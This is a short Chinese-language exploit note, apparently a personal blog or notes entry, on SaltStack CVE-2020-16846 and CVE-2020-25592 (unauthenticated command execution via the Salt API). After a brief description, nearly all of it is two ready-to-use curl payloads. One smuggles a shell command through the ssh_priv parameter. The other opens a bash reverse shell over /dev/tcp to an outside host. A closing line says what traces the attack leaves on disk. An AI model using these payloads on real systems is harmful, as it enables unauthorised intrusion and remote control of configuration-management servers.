SaltStack 是基于 Python 开发的一套C/S架构配置管理工具。2020年11月SaltStack官方披露了CVE-2020-16846和CVE-2020-25592两个漏洞,其中CVE-2020-25592允许任意用户调用SSH模块,CVE-2020-16846允许用户执行任意命令。组合这两个漏洞,将可以使未授权的攻击者通过Salt API执行任意命令。
EXP(无回显任意命令执行)
1 | curl -k -X POST https://127.0.0.1:8000 -d "token=abc&client=ssh&tgt=*&fun=a&roster=whip1ash&ssh_priv=abc|touch%20/tmp/success%3b" |
反弹shell
1 | curl -k -X POST https://10.170.0.3:8000/run -d "token=abc&client=ssh&tgt=*&fun=a&roster=whip1ash&ssh_priv=abc|bash%20-c%20%27bash%20-i%20%3E%26%2Fdev%2Ftcp%2F172.18.0.1%2F1234%200%3E%261%27%3b |
痕迹
执行poc/exp后根目录下就会多了ssh_priv的值的文件/文件夹
